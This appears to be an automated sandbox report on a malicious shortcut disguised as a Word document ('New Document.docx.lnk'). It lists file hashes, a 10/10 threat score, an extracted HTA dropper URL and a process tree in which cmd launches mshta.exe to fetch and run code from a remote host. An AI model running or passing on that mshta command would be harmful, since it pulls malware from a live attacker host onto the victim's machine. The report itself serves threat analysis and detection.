Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
  • submitted
    01-03-2023 16:26

General

  • Target

    Data/New Document.docx.lnk

  • Size

    548KB

  • MD5

    1a1c8c0f5cafb7df661086bcb804154c

  • SHA1

    3b0f3682f9407bf0e0f8c80c42d5b5eb07f3e009

  • SHA256

    06daafd4c09594d660c2191b4a421564b492a7043e4db4e91827fbc732d068a8

  • SHA512

    c12904f4fa9ae06f0be15296c65fa4496153555e0d7543a944646661b009450ed9cf0bbe3c0aaf86f514514990ee108037ec976f7dd371bd998609c02075ed8a

  • SSDEEP

    12288:U91M3doO2I7h0nGYeLfT9wgeRNLgEP2X9BGFsqmXxI:uMC67h0n92X9BGSqGxI

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://hpuniversity.in/files/data/start

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Data\New Document.docx.lnk"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://hpuniversity.in/files/data/start && mshta.exe
      2⤵
      • Modifies Internet Explorer settings
      PID:1200

Network

MITRE ATT&CK Enterprise v6

Downloads